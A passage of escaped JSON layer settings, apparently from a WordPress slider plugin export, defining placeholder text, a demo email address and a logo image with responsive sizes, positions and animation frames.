"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"1\":{\"text\":\"Succulets is simply dummy text of the printing and\\n\",\"alias\":\"1\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"v\":\"356px\",\"e\":true},\"n\":{\"v\":\"356px\",\"e\":true},\"t\":{\"v\":\"354px\",\"e\":true},\"m\":{\"v\":\"311px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"26px\",\"e\":true},\"t\":{\"v\":\"26px\",\"e\":true},\"m\":{\"v\":\"26px\",\"e\":true}},\"originalWidth\":\"356px\"},\"position\":{\"x\":{\"d\":{\"v\":\"542px\",\"e\":true},\"n\":{\"v\":\"300px\",\"e\":true},\"t\":{\"v\":\"17px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"216px\",\"e\":true},\"n\":{\"v\":\"113px\",\"e\":true},\"t\":{\"v\":\"204px\",\"e\":true},\"m\":{\"v\":\"100px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"succulents@select-themes.com\",\"alias\":\"Email\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"227px\",\"e\":true},\"n\":{\"v\":\"226px\",\"e\":true},\"t\":{\"v\":\"222px\",\"e\":true},\"m\":{\"v\":\"222px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"23px\",\"e\":true},\"t\":{\"v\":\"23px\",\"e\":true},\"m\":{\"v\":\"23px\",\"e\":true}},\"originalWidth\":\"227px\",\"originalHeight\":\"30px\"},\"position\":{\"x\":{\"d\":{\"v\":\"549px\",\"e\":true},\"n\":{\"v\":\"310px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"336px\",\"e\":true},\"n\":{\"v\":\"213px\",\"e\":true},\"t\":{\"v\":\"308px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 5\",\"alias\":\"Logo\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/logo-1.png\",\"imageId\":52},\"size\":{\"width\":{\"d\":{\"v\":\"326px\",\"e\":true},\"n\":{\"v\":\"326px\",\"e\":true},\"t\":{\"v\":\"326px\",\"e\":true},\"m\":{\"v\":\"326px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"54px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"54px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"originalWidth\":470,\"originalHeight\":78,\"aspectRatio\":{\"d\":{\"v\":6.0256410256410255},\"n\":{\"v\":6.0256410256410255},\"t\":{\"v\":6.0256410256410255},\"m\":{\"v\":6.0256410256410255}}},\"position\":{\"x\":{\"d\":{\"v\":\"542px\",\"e\":true},\"n\":{\"v\":\"300px\",\"e\":true},\"t\":{\"v\":\"229px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"158px\",\"e\":true},\"n\":{\"v\":\"58px\",\"e\":true},\"t\":{\"v\":\"603px\",\"e\":true},\"m\":{\"v\":\"42px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"typesetting industry lorem ipsum lorem dummy text of \",\"alias\":\"2.\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"383px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"381px\",\"e\":true},\"m\":{\"v\":\"336px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"23px\",\"e\":true},\"n\":{\"v\":\"26px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"23px\",\"e\":true}},\"originalWidth\":\"383px\",\"originalHeight\":\"23px\"},\"position\":{\"x\":{\"d\":{\"v\":\"547px\",\"e\":true},\"n\":{\"v\":\"300px\",\"e\":true},\"t\":{\"v\":\"180px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"250px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"234px\",\"e\":true},\"m\":{\"v\":\"127px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":2000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#959595\",\"e\":true},\"n\":{\"v\":\"#959595\",\"e\":true},\"t\":{\"v\":\"#959595\",\"e\":true},\"m\":{\"v\":\"#959595\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\